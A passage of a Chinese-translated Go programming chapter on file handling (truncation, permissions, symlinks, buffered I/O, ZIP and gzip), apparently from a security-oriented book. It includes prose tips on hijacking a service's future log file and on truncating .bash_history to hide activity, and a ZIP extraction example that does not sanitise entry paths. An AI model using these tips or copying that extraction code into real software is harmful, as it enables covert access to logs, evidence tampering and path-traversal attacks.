本章的一个专门部分是关于从文件中读取和写入的不同方式。有多个包含有用函数的包;此外,读取器和写入器接口可以实现许多不同的选项,例如缓冲读取器和写入器,直接读取和写入,扫描器,以及用于快速操作的辅助函数。

此外,还提供了用于归档和解档、压缩和解压缩、创建临时文件和目录以及通过 HTTP 下载文件的示例。

具体来说,本章将涵盖以下主题:

  • 创建空文件和截断文件

  • 获取详细的文件信息

  • 重命名、移动和删除文件

  • 操作权限、所有权和时间戳

  • 符号链接

  • 多种读写文件的方式

  • 归档

  • 压缩

  • 临时文件和目录

  • 通过 HTTP 下载文件

文件基础知识

因为文件是计算生态系统中不可或缺的一部分,了解 Go 中处理文件的选项至关重要。本节涵盖了一些基本操作,如打开、关闭、创建和删除文件。此外,它还涵盖了重命名和移动文件,查看文件是否存在,修改权限、所有权、时间戳以及处理符号链接。这些示例中大多数使用了一个硬编码的文件名test.txt。如果要操作不同的文件,请更改此文件名。

创建空文件

Linux 中常用的一个工具是touch程序。当您需要快速创建具有特定名称的空文件时,它经常被使用。以下示例复制了touch的一个常见用例,即创建一个空文件。

创建空文件的用途有限,但让我们考虑一个例子。假设有一个服务将日志写入一组旋转的文件中。每天都会创建一个带有当前日期的新文件,并将当天的日志写入该文件。开发人员可能会聪明地对日志文件设置非常严格的权限,以便只有管理员可以读取它们。但是,如果他们在目录上留下了宽松的权限会怎么样?如果您创建了一个带有下一天日期的空文件会发生什么?服务可能只会在不存在日志文件时创建新的日志文件,但如果存在一个文件,它将在不检查权限的情况下使用它。您可以利用这一点,创建一个您有读取权限的空文件。该文件应该以服务命名日志文件的方式命名。例如,如果服务使用以下格式记录日志:logs-2018-01-30.txt,您可以创建一个名为logs-2018-01-31.txt的空文件,第二天,服务将写入该文件,因为它已经存在,而您将具有读取权限,而不是服务如果没有文件存在则创建一个具有仅根权限的新文件。

以下是此示例的代码实现:

package main 

import ( 
   "log" 
   "os" 
) 

func main() { 
   newFile, err := os.Create("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Println(newFile) 
   newFile.Close() 
} 

截断文件

截断文件是指将文件修剪到最大长度。截断通常用于完全删除文件的所有内容,但也可以用于将文件限制为特定的最大大小。os.Truncate()的一个显着特点是,如果文件小于指定的截断限制,它将实际增加文件的长度。它将用空字节填充任何空白空间。

截断文件比创建空文件有更多的实际用途。当日志文件变得太大时,可以截断它们以节省磁盘空间。如果您正在攻击,可能希望截断.bash_history和其他日志文件以掩盖您的踪迹。恶意行为者可能仅仅为了破坏数据而截断文件。

package main 

import ( 
   "log" 
   "os" 
) 

func main() { 
   // Truncate a file to 100 bytes. If file 
   // is less than 100 bytes the original contents will remain 
   // at the beginning, and the rest of the space is 
   // filled will null bytes. If it is over 100 bytes, 
   // Everything past 100 bytes will be lost. Either way 
   // we will end up with exactly 100 bytes. 
   // Pass in 0 to truncate to a completely empty file 

   err := os.Truncate("test.txt", 100) 
   if err != nil { 
      log.Fatal(err) 
   } 
} 

获取文件信息

以下示例将打印有关文件的所有可用元数据。它包括显而易见的属性,即名称、大小、权限、上次修改时间以及它是否是目录。它包含的最后一个数据片段是FileInfo.Sys()接口。这包含有关文件底层来源的信息,最常见的是硬盘上的文件系统:

package main 

import ( 
   "fmt" 
   "log" 
   "os" 
) 

func main() { 
   // Stat returns file info. It will return 
   // an error if there is no file. 
   fileInfo, err := os.Stat("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Println("File name:", fileInfo.Name()) 
   fmt.Println("Size in bytes:", fileInfo.Size()) 
   fmt.Println("Permissions:", fileInfo.Mode()) 
   fmt.Println("Last modified:", fileInfo.ModTime()) 
   fmt.Println("Is Directory: ", fileInfo.IsDir()) 
   fmt.Printf("System interface type: %T\n", fileInfo.Sys()) 
   fmt.Printf("System info: %+v\n\n", fileInfo.Sys()) 
} 

重命名文件

标准库提供了一个方便的函数来移动文件。重命名和移动是同义词;如果要将文件从一个目录移动到另一个目录,请使用os.Rename()函数,如下面的代码块所示:

package main 

import ( 
   "log" 
   "os" 
) 

func main() { 
   originalPath := "test.txt" 
   newPath := "test2.txt" 
   err := os.Rename(originalPath, newPath) 
   if err != nil { 
      log.Fatal(err) 
   } 
} 

删除文件

以下示例很简单,演示了如何删除文件。标准包提供了os.Remove(),它需要一个文件路径:

package main 

import ( 
   "log" 
   "os" 
) 

func main() { 
   err := os.Remove("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
} 

打开和关闭文件

在打开文件时,有几个选项。当调用os.Open()时,它只需要一个文件名,并提供一个只读文件。另一个选项是使用os.OpenFile(),它需要更多的选项。您可以指定是否要只读或只写文件。您还可以选择在打开时读取和写入、追加、如果不存在则创建,或者截断。将所需的选项与逻辑或运算符结合。通过在文件对象上调用Close()来关闭文件。您可以显式关闭文件,也可以推迟调用。有关defer关键字的更多详细信息,请参阅第二章,Go 编程语言。以下示例不使用defer关键字选项,但后续示例将使用:

package main 

import ( 
   "log" 
   "os" 
) 

func main() { 
   // Simple read only open. We will cover actually reading 
   // and writing to files in examples further down the page 
   file, err := os.Open("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   }  
   file.Close() 

   // OpenFile with more options. Last param is the permission mode 
   // Second param is the attributes when opening 
   file, err = os.OpenFile("test.txt", os.O_APPEND, 0666) 
   if err != nil { 
      log.Fatal(err) 
   } 
   file.Close() 

   // Use these attributes individually or combined 
   // with an OR for second arg of OpenFile() 
   // e.g. os.O_CREATE|os.O_APPEND 
   // or os.O_CREATE|os.O_TRUNC|os.O_WRONLY 

   // os.O_RDONLY // Read only 
   // os.O_WRONLY // Write only 
   // os.O_RDWR // Read and write 
   // os.O_APPEND // Append to end of file 
   // os.O_CREATE // Create is none exist 
   // os.O_TRUNC // Truncate file when opening 
} 

检查文件是否存在

检查文件是否存在是一个两步过程。首先,必须在文件上调用os.Stat()以获取FileInfo。如果文件不存在,则不会返回FileInfo结构,而是返回一个错误。os.Stat()可能返回多个错误,因此必须检查错误类型。标准库提供了一个名为os.IsNotExist()的函数,它将检查错误,以查看是否是因为文件不存在而引起的。

如果文件不存在,以下示例将调用log.Fatal(),但您可以优雅地处理错误,并在需要时继续而不退出:

package main 

import ( 
   "log" 
   "os" 
) 

func main() { 
   // Stat returns file info. It will return 
   // an error if there is no file. 
   fileInfo, err := os.Stat("test.txt") 
   if err != nil { 
      if os.IsNotExist(err) { 
         log.Fatal("File does not exist.") 
      } 
   } 
   log.Println("File does exist. File information:") 
   log.Println(fileInfo) 
} 

检查读取和写入权限

与前面的示例类似,通过检查错误使用名为os.IsPermission()的函数来检查读取和写入权限。如果错误是由于权限问题引起的,该函数将返回 true,如下例所示:

package main 

import ( 
   "log" 
   "os" 
) 

func main() { 
   // Test write permissions. It is possible the file 
   // does not exist and that will return a different 
   // error that can be checked with os.IsNotExist(err) 
   file, err := os.OpenFile("test.txt", os.O_WRONLY, 0666) 
   if err != nil { 
      if os.IsPermission(err) { 
         log.Println("Error: Write permission denied.") 
      } 
   } 
   file.Close() 

   // Test read permissions 
   file, err = os.OpenFile("test.txt", os.O_RDONLY, 0666) 
   if err != nil { 
      if os.IsPermission(err) { 
         log.Println("Error: Read permission denied.") 
      } 
   } 
   file.Close()
} 

更改权限、所有权和时间戳

如果您拥有文件或有相应的权限,可以更改所有权、时间戳和权限。标准库提供了一组函数。它们在这里给出:

  • os.Chmod()

  • os.Chown()

  • os.Chtimes()

以下示例演示了如何使用这些函数来更改文件的元数据。

package main 

import ( 
   "log" 
   "os" 
   "time" 
) 

func main() { 
   // Change permissions using Linux style 
   err := os.Chmod("test.txt", 0777) 
   if err != nil { 
      log.Println(err) 
   } 

   // Change ownership 
   err = os.Chown("test.txt", os.Getuid(), os.Getgid()) 
   if err != nil { 
      log.Println(err) 
   } 

   // Change timestamps 
   twoDaysFromNow := time.Now().Add(48 * time.Hour) 
   lastAccessTime := twoDaysFromNow 
   lastModifyTime := twoDaysFromNow 
   err = os.Chtimes("test.txt", lastAccessTime, lastModifyTime) 
   if err != nil { 
      log.Println(err) 
   } 
} 

硬链接和符号链接

典型的文件只是硬盘上的一个指针,称为 inode。硬链接会创建一个指向相同位置的新指针。只有在删除所有指向文件的链接后,文件才会从磁盘中删除。硬链接只能在相同的文件系统上工作。硬链接是您可能认为是“正常”链接的东西。

符号链接或软链接有点不同,它不直接指向磁盘上的位置。符号链接只通过名称引用其他文件。它们可以指向不同文件系统上的文件。但是,并非所有系统都支持符号链接。

在历史上,Windows 对符号链接的支持并不好,但这些示例在 Windows 10 专业版中进行了测试,如果您拥有管理员权限,硬链接和符号链接都可以正常工作。要以管理员身份从命令行执行 Go 程序,首先右键单击命令提示符并选择以管理员身份运行。然后您可以执行程序,符号链接和硬链接将按预期工作。

以下示例演示了如何创建硬链接和符号链接文件,以及如何确定文件是否是符号链接,以及如何修改符号链接文件的元数据而不更改原始文件:

package main 

import ( 
   "fmt" 
   "log" 
   "os" 
) 

func main() { 
   // Create a hard link 
   // You will have two file names that point to the same contents 
   // Changing the contents of one will change the other 
   // Deleting/renaming one will not affect the other 
   err := os.Link("original.txt", "original_also.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 

   fmt.Println("Creating symlink") 
   // Create a symlink 
   err = os.Symlink("original.txt", "original_sym.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 

   // Lstat will return file info, but if it is actually 
   // a symlink, it will return info about the symlink. 
   // It will not follow the link and give information 
   // about the real file 
   // Symlinks do not work in Windows 
   fileInfo, err := os.Lstat("original_sym.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Printf("Link info: %+v", fileInfo) 

   // Change ownership of a symlink only 
   // and not the file it points to 
   err = os.Lchown("original_sym.txt", os.Getuid(), os.Getgid()) 
   if err != nil { 
      log.Fatal(err) 
   } 
} 

读写

读写文件可以通过多种方式完成。Go 提供了接口,使得编写自己的函数来处理文件或任何其他读取/写入接口变得容易。

通过osioioutil包,您可以找到适合您需求的正确函数。这些示例涵盖了许多可用选项。

复制文件

以下示例使用io.Copy()函数将内容从一个读取器复制到另一个写入器:

package main 

import ( 
   "io" 
   "log" 
   "os" 
) 

func main() { 
   // Open original file 
   originalFile, err := os.Open("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer originalFile.Close() 

   // Create new file 
   newFile, err := os.Create("test_copy.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer newFile.Close() 

   // Copy the bytes to destination from source 
   bytesWritten, err := io.Copy(newFile, originalFile) 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Copied %d bytes.", bytesWritten) 

   // Commit the file contents 
   // Flushes memory to disk 
   err = newFile.Sync() 
   if err != nil { 
      log.Fatal(err) 
   }  
} 

在文件中寻找位置

Seek()函数用于将文件光标设置在特定位置。默认情况下,它从偏移量 0 开始,并随着读取字节而向前移动。您可能希望将光标重置到文件的开头,或者直接跳转到特定位置。Seek()函数允许您执行此操作。

Seek()接受两个参数。第一个是距离,即你想要以字节为单位移动光标。它可以通过正整数向前移动,或者通过提供负数向文件后退。第一个参数,即距离,是一个相对值,而不是文件中的绝对位置。第二个参数指定了相对点的起始位置,称为whencewhence参数是相对偏移的参考点。它可以是012,分别表示文件的开头、当前位置和文件的结尾。

例如,如果指定了Seek(-1, 2),它将把文件光标设置在文件末尾的前一个字节。Seek(2, 0)将在file.Seek(5, 1)的开始处寻找第二个字节,这将使光标从当前位置向前移动 5 个字节:

package main 

import ( 
   "fmt" 
   "log" 
   "os" 
) 

func main() { 
   file, _ := os.Open("test.txt") 
   defer file.Close() 

   // Offset is how many bytes to move 
   // Offset can be positive or negative 
   var offset int64 = 5 

   // Whence is the point of reference for offset 
   // 0 = Beginning of file 
   // 1 = Current position 
   // 2 = End of file 
   var whence int = 0 
   newPosition, err := file.Seek(offset, whence) 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Println("Just moved to 5:", newPosition) 

   // Go back 2 bytes from current position 
   newPosition, err = file.Seek(-2, 1) 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Println("Just moved back two:", newPosition) 

   // Find the current position by getting the 
   // return value from Seek after moving 0 bytes 
   currentPosition, err := file.Seek(0, 1) 
   fmt.Println("Current position:", currentPosition) 

   // Go to beginning of file 
   newPosition, err = file.Seek(0, 0) 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Println("Position after seeking 0,0:", newPosition) 
} 

向文件写入字节

使用os包就可以进行写入操作,因为打开文件时已经需要它。由于所有的 Go 可执行文件都是静态链接的二进制文件,每导入一个包都会增加可执行文件的大小。其他包如ioioutilbufio提供了一些帮助,但并非必需品:

package main 

import ( 
   "log" 
   "os" 
) 

func main() { 
   // Open a new file for writing only 
   file, err := os.OpenFile( 
      "test.txt", 
      os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 
      0666, 
   ) 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer file.Close() 

   // Write bytes to file 
   byteSlice := []byte("Bytes!\n") 
   bytesWritten, err := file.Write(byteSlice) 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Wrote %d bytes.\n", bytesWritten) 
} 

快速写入文件

ioutil包有一个有用的函数叫做WriteFile(),它将处理创建/打开、写入字节片段和关闭。如果您只需要一种快速的方法将字节片段转储到文件中,这将非常有用:

package main 

import ( 
   "io/ioutil" 
   "log" 
) 

func main() { 
   err := ioutil.WriteFile("test.txt", []byte("Hi\n"), 0666) 
   if err != nil { 
      log.Fatal(err) 
   } 
} 

带缓冲的写入器

bufio包允许您创建一个带缓冲的写入器,以便您可以在将其写入磁盘之前在内存中处理缓冲区。如果您需要在将数据写入磁盘之前对数据进行大量操作以节省磁盘 IO 时间,则这是有用的。如果您一次只写入一个字节,并且希望在将其一次性存储到文件之前在内存缓冲区中存储大量数据,否则您将为每个字节执行磁盘 IO。这会对您的磁盘造成磨损,并减慢进程速度。

可以检查缓冲写入器,查看它当前存储了多少未缓冲的数据,以及剩余多少缓冲空间。缓冲区也可以重置以撤消自上次刷新以来的任何更改。缓冲区也可以调整大小。

以下示例打开名为test.txt的文件,并创建一个包装文件对象的缓冲写入器。一些字节被写入缓冲区,然后写入一个字符串。然后检查内存缓冲区,然后将缓冲区的内容刷新到磁盘上的文件。它还演示了如何重置缓冲区,撤消尚未刷新的任何更改,以及如何检查缓冲区中剩余的空间。最后,它演示了如何将缓冲区的大小调整为特定大小:

package main 

import ( 
   "bufio" 
   "log" 
   "os" 
) 

func main() { 
   // Open file for writing 
   file, err := os.OpenFile("test.txt", os.O_WRONLY, 0666) 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer file.Close() 

   // Create a buffered writer from the file 
   bufferedWriter := bufio.NewWriter(file) 

   // Write bytes to buffer 
   bytesWritten, err := bufferedWriter.Write( 
      []byte{65, 66, 67}, 
   ) 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Bytes written: %d\n", bytesWritten) 

   // Write string to buffer 
   // Also available are WriteRune() and WriteByte() 
   bytesWritten, err = bufferedWriter.WriteString( 
      "Buffered string\n", 
   ) 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Bytes written: %d\n", bytesWritten) 

   // Check how much is stored in buffer waiting 
   unflushedBufferSize := bufferedWriter.Buffered() 
   log.Printf("Bytes buffered: %d\n", unflushedBufferSize) 

   // See how much buffer is available 
   bytesAvailable := bufferedWriter.Available() 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Available buffer: %d\n", bytesAvailable) 

   // Write memory buffer to disk 
   bufferedWriter.Flush() 

   // Revert any changes done to buffer that have 
   // not yet been written to file with Flush() 
   // We just flushed, so there are no changes to revert 
   // The writer that you pass as an argument 
   // is where the buffer will output to, if you want 
   // to change to a new writer 
   bufferedWriter.Reset(bufferedWriter) 

   // See how much buffer is available 
   bytesAvailable = bufferedWriter.Available() 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Available buffer: %d\n", bytesAvailable) 

   // Resize buffer. The first argument is a writer 
   // where the buffer should output to. In this case 
   // we are using the same buffer. If we chose a number 
   // that was smaller than the existing buffer, like 10 
   // we would not get back a buffer of size 10, we will 
   // get back a buffer the size of the original since 
   // it was already large enough (default 4096) 
   bufferedWriter = bufio.NewWriterSize( 
      bufferedWriter, 
      8000, 
   ) 

   // Check available buffer size after resizing 
   bytesAvailable = bufferedWriter.Available() 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Available buffer: %d\n", bytesAvailable) 
} 

从文件中读取最多 n 个字节

os.File类型带有一些基本函数。其中之一是File.Read()Read()需要传递一个字节切片作为参数。字节从文件中读取并放入字节切片中。Read()将尽可能多地读取字节,直到缓冲区填满,然后停止读取。

在调用Read()之前,可能需要多次调用Read(),具体取决于提供的缓冲区大小和文件的大小。如果在调用Read()期间到达文件的末尾,则会返回一个io.EOF错误:

package main 

import ( 
   "log" 
   "os" 
) 

func main() { 
   // Open file for reading 
   file, err := os.Open("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer file.Close() 

   // Read up to len(b) bytes from the File 
   // Zero bytes written means end of file 
   // End of file returns error type io.EOF 
   byteSlice := make([]byte, 16) 
   bytesRead, err := file.Read(byteSlice) 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Number of bytes read: %d\n", bytesRead) 
   log.Printf("Data read: %s\n", byteSlice) 
} 

读取确切的 n 个字节

在前面的例子中,如果File.Read()只包含 10 个字节的文件,但您提供了一个包含 500 个字节的字节切片缓冲区,它将不会返回错误。有些情况下,您希望确保整个缓冲区都被填满。如果整个缓冲区没有被填满,io.ReadFull()函数将返回错误。如果io.ReadFull()没有任何数据可读,将返回 EOF 错误。如果它读取了一些数据,然后遇到 EOF,它将返回ErrUnexpectedEOF错误:

package main 

import ( 
   "io" 
   "log" 
   "os" 
) 

func main() { 
   // Open file for reading 
   file, err := os.Open("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 

   // The file.Read() function will happily read a tiny file in to a    
   // large byte slice, but io.ReadFull() will return an 
   // error if the file is smaller than the byte slice. 
   byteSlice := make([]byte, 2) 
   numBytesRead, err := io.ReadFull(file, byteSlice) 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Number of bytes read: %d\n", numBytesRead) 
   log.Printf("Data read: %s\n", byteSlice) 
} 

至少读取 n 个字节

io包提供的另一个有用函数是io.ReadAtLeast()。如果至少没有指定数量的字节,则会返回错误。与io.ReadFull()类似,如果没有找到数据,则返回EOF错误,如果在遇到文件结束之前读取了一些数据,则返回ErrUnexpectedEOF错误:

package main 

import ( 
   "io" 
   "log" 
   "os" 
) 

func main() { 
   // Open file for reading 
   file, err := os.Open("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 

   byteSlice := make([]byte, 512) 
   minBytes := 8 
   // io.ReadAtLeast() will return an error if it cannot 
   // find at least minBytes to read. It will read as 
   // many bytes as byteSlice can hold. 
   numBytesRead, err := io.ReadAtLeast(file, byteSlice, minBytes) 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Number of bytes read: %d\n", numBytesRead) 
   log.Printf("Data read: %s\n", byteSlice) 
} 

读取文件的所有字节

ioutil包提供了一个函数,可以读取文件中的每个字节并将其作为字节切片返回。这个函数很方便,因为在进行读取之前不必定义字节切片。缺点是,一个非常大的文件将返回一个可能比预期更大的大切片。

io.ReadAll()函数期望一个已经用os.Open()Create()打开的文件:

package main 

import ( 
   "fmt" 
   "io/ioutil" 
   "log" 
   "os" 
) 

func main() { 
   // Open file for reading 
   file, err := os.Open("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 

   // os.File.Read(), io.ReadFull(), and 
   // io.ReadAtLeast() all work with a fixed 
   // byte slice that you make before you read 

   // ioutil.ReadAll() will read every byte 
   // from the reader (in this case a file), 
   // and return a slice of unknown slice 
   data, err := ioutil.ReadAll(file) 
   if err != nil { 
      log.Fatal(err) 
   } 

   fmt.Printf("Data as hex: %x\n", data) 
   fmt.Printf("Data as string: %s\n", data) 
   fmt.Println("Number of bytes read:", len(data)) 
} 

快速将整个文件读取到内存中

与前面示例中的io.ReadAll()函数类似,io.ReadFile()将读取文件中的所有字节并返回一个字节切片。两者之间的主要区别在于io.ReadFile()期望一个文件路径,而不是已经打开的文件对象。io.ReadFile()函数将负责打开、读取和关闭文件。您只需提供一个文件名,它就会提供字节。这通常是加载文件数据的最快最简单的方法。

虽然这种方法非常方便,但它有一些限制;因为它直接将整个文件读取到内存中,非常大的文件可能会耗尽系统的内存限制:

package main 

import ( 
   "io/ioutil" 
   "log" 
) 

func main() { 
   // Read file to byte slice 
   data, err := ioutil.ReadFile("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 

   log.Printf("Data read: %s\n", data) 
} 

缓冲读取器

创建一个缓冲读取器将存储一些内容的内存缓冲区。缓冲读取器还提供了一些os.Fileio.Reader类型上不可用的其他函数。默认缓冲区大小为 4096,最小大小为 16。缓冲读取器提供了一组有用的函数。一些可用的函数包括但不限于以下内容:

  • Read(): 这是将数据读入字节切片

  • Peek(): 这是在不移动文件光标的情况下检查下一个字节

  • ReadByte(): 这是读取单个字节

  • UnreadByte(): 这会取消上次读取的最后一个字节

  • ReadBytes(): 这会读取字节,直到达到指定的分隔符

  • ReadString(): 这会读取字符串,直到达到指定的分隔符

以下示例演示了如何使用缓冲读取器从文件获取数据。首先,它打开一个文件,然后创建一个包装文件对象的缓冲读取器。一旦缓冲读取器准备好了,它就展示了如何使用前面的函数:

package main 

import ( 
   "bufio" 
   "fmt" 
   "log" 
   "os" 
) 

func main() { 
   // Open file and create a buffered reader on top 
   file, err := os.Open("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   bufferedReader := bufio.NewReader(file) 

   // Get bytes without advancing pointer 
   byteSlice := make([]byte, 5) 
   byteSlice, err = bufferedReader.Peek(5) 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Printf("Peeked at 5 bytes: %s\n", byteSlice) 

   // Read and advance pointer 
   numBytesRead, err := bufferedReader.Read(byteSlice) 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Printf("Read %d bytes: %s\n", numBytesRead, byteSlice) 

   // Ready 1 byte. Error if no byte to read 
   myByte, err := bufferedReader.ReadByte() 
   if err != nil { 
      log.Fatal(err) 
   }  
   fmt.Printf("Read 1 byte: %c\n", myByte) 

   // Read up to and including delimiter 
   // Returns byte slice 
   dataBytes, err := bufferedReader.ReadBytes('\n') 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Printf("Read bytes: %s\n", dataBytes) 

   // Read up to and including delimiter 
   // Returns string 
   dataString, err := bufferedReader.ReadString('\n') 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Printf("Read string: %s\n", dataString) 

   // This example reads a few lines so test.txt 
   // should have a few lines of text to work correct 
} 

使用缓冲读取器读取

Scanner 是bufio包的一部分。它对于在特定分隔符处逐步浏览文件很有用。通常,换行符被用作分隔符来按行分割文件。在 CSV 文件中,逗号将是分隔符。os.File对象可以像缓冲读取器一样包装在bufio.Scanner对象中。我们将调用Scan()来读取到下一个分隔符,然后使用Text()Bytes()来获取已读取的数据。

分隔符不仅仅是一个简单的字节或字符。实际上有一个特殊的函数,您必须实现它,它将确定下一个分隔符在哪里,向前推进指针的距离以及要返回的数据。如果没有提供自定义的SplitFunc类型,则默认为ScanLines,它将在每个换行符处分割。bufio中包含的其他分割函数有ScanRunesScanWords

要定义自己的分割函数,请定义一个与此指纹匹配的函数:

type SplitFuncfunc(data []byte, atEOF bool) (advance int, token []byte, 
   err error)

返回(0nilnil)将告诉扫描器再次扫描,但使用更大的缓冲区,因为没有足够的数据达到分隔符。

在下面的示例中,从文件创建了bufio.Scanner,然后逐字扫描文件:

package main 

import ( 
   "bufio" 
   "fmt" 
   "log" 
   "os" 
) 

func main() { 
   // Open file and create scanner on top of it 
   file, err := os.Open("test.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   scanner := bufio.NewScanner(file) 

   // Default scanner is bufio.ScanLines. Lets use ScanWords. 
   // Could also use a custom function of SplitFunc type 
   scanner.Split(bufio.ScanWords) 

   // Scan for next token. 
   success := scanner.Scan() 
   if success == false { 
      // False on error or EOF. Check error 
      err = scanner.Err() 
      if err == nil { 
         log.Println("Scan completed and reached EOF") 
      } else { 
         log.Fatal(err) 
      } 
   } 

   // Get data from scan with Bytes() or Text() 
   fmt.Println("First word found:", scanner.Text()) 

   // Call scanner.Scan() manually, or loop with for 
   for scanner.Scan() { 
      fmt.Println(scanner.Text()) 
   } 
} 

存档

存档是一种存储多个文件的文件格式。最常见的两种存档格式是 tar 文件和 ZIP 存档。Go 标准库有tarzip包。这些示例使用 ZIP 格式,但 tar 格式可以很容易地互换。

存档(ZIP)文件

以下示例演示了如何创建一个包含多个文件的存档。示例中的文件是硬编码的,只有几个字节,但应该很容易适应其他需求:

// This example uses zip but standard library 
// also supports tar archives 
package main 

import ( 
   "archive/zip" 
   "log" 
   "os" 
) 

func main() { 
   // Create a file to write the archive buffer to 
   // Could also use an in memory buffer. 
   outFile, err := os.Create("test.zip") 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer outFile.Close() 

   // Create a zip writer on top of the file writer 
   zipWriter := zip.NewWriter(outFile) 

   // Add files to archive 
   // We use some hard coded data to demonstrate, 
   // but you could iterate through all the files 
   // in a directory and pass the name and contents 
   // of each file, or you can take data from your 
   // program and write it write in to the archive without 
   var filesToArchive = []struct { 
      Name, Body string 
   }{ 
      {"test.txt", "String contents of file"}, 
      {"test2.txt", "\x61\x62\x63\n"}, 
   } 

   // Create and write files to the archive, which in turn 
   // are getting written to the underlying writer to the 
   // .zip file we created at the beginning 
   for _, file := range filesToArchive { 
      fileWriter, err := zipWriter.Create(file.Name) 
      if err != nil { 
         log.Fatal(err) 
      } 
      _, err = fileWriter.Write([]byte(file.Body)) 
      if err != nil { 
         log.Fatal(err) 
      } 
   } 

   // Clean up 
   err = zipWriter.Close() 
   if err != nil { 
      log.Fatal(err) 
   } 
} 

提取(解压)存档文件

以下示例演示了如何解压 ZIP 格式文件。它将通过创建必要的目录来复制存档中找到的目录结构:

// This example uses zip but standard library 
// also supports tar archives 
package main 

import ( 
   "archive/zip" 
   "io" 
   "log" 
   "os" 
   "path/filepath" 
) 

func main() { 
   // Create a reader out of the zip archive 
   zipReader, err := zip.OpenReader("test.zip") 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer zipReader.Close() 

   // Iterate through each file/dir found in 
   for _, file := range zipReader.Reader.File { 
      // Open the file inside the zip archive 
      // like a normal file 
      zippedFile, err := file.Open() 
      if err != nil { 
         log.Fatal(err) 
      } 
      defer zippedFile.Close() 

      // Specify what the extracted file name should be. 
      // You can specify a full path or a prefix 
      // to move it to a different directory. 
      // In this case, we will extract the file from 
      // the zip to a file of the same name. 
      targetDir := "./" 
      extractedFilePath := filepath.Join( 
         targetDir, 
         file.Name, 
      ) 

      // Extract the item (or create directory) 
      if file.FileInfo().IsDir() { 
         // Create directories to recreate directory 
         // structure inside the zip archive. Also 
         // preserves permissions 
         log.Println("Creating directory:", extractedFilePath) 
         os.MkdirAll(extractedFilePath, file.Mode()) 
      } else { 
         // Extract regular file since not a directory 
         log.Println("Extracting file:", file.Name) 

         // Open an output file for writing 
         outputFile, err := os.OpenFile( 
            extractedFilePath, 
            os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 
            file.Mode(), 
         ) 
         if err != nil { 
            log.Fatal(err) 
         } 
         defer outputFile.Close() 

         // "Extract" the file by copying zipped file 
         // contents to the output file 
         _, err = io.Copy(outputFile, zippedFile) 
         if err != nil { 
            log.Fatal(err) 
         } 
      }  
   } 
} 

压缩

Go 标准库还支持压缩,这与存档不同。通常,存档和压缩结合在一起,将大量文件打包成一个紧凑的文件。最常见的格式可能是.tar.gz文件,这是一个 gzipped tar 文件。不要混淆 zip 和 gzip,它们是两种不同的东西。

Go 标准库支持多种压缩算法:

  • bzip2:bzip2 格式

  • flate:DEFLATE(RFC 1951)

  • gzip:gzip 格式(RFC 1952)

  • lzw:来自《高性能数据压缩技术,计算机,17(6)(1984 年 6 月),第 8-19 页》的 Lempel-Ziv-Welch 格式

  • zlib:zlib 格式(RFC 1950)

golang.org/pkg/compress/中阅读有关每个包的更多信息。这些示例使用 gzip 压缩,但应该很容易地互换上述任何包。

压缩文件

以下示例演示了如何使用gzip包压缩文件:

// This example uses gzip but standard library also 
// supports zlib, bz2, flate, and lzw 
package main 

import ( 
   "compress/gzip" 
   "log" 
   "os" 
) 

func main() { 
   // Create .gz file to write to 
   outputFile, err := os.Create("test.txt.gz") 
   if err != nil { 
      log.Fatal(err) 
   } 

   // Create a gzip writer on top of file writer 
   gzipWriter := gzip.NewWriter(outputFile) 
   defer gzipWriter.Close() 

   // When we write to the gzip writer 
   // it will in turn compress the contents 
   // and then write it to the underlying 
   // file writer as well 
   // We don't have to worry about how all 
   // the compression works since we just 
   // use it as a simple writer interface 
   // that we send bytes to 
   _, err = gzipWriter.Write([]byte("Gophers rule!\n")) 
   if err != nil { 
      log.Fatal(err) 
   } 

   log.Println("Compressed data written to file.") 
} 

解压文件

以下示例演示了如何使用gzip算法解压文件:

// This example uses gzip but standard library also 
// supports zlib, bz2, flate, and lzw 
package main 

import ( 
   "compress/gzip" 
   "io" 
   "log" 
   "os" 
) 

func main() { 
   // Open gzip file that we want to uncompress 
   // The file is a reader, but we could use any 
   // data source. It is common for web servers 
   // to return gzipped contents to save bandwidth 
   // and in that case the data is not in a file 
   // on the file system but is in a memory buffer 
   gzipFile, err := os.Open("test.txt.gz") 
   if err != nil { 
      log.Fatal(err) 
   } 

   // Create a gzip reader on top of the file reader 
   // Again, it could be any type reader though 
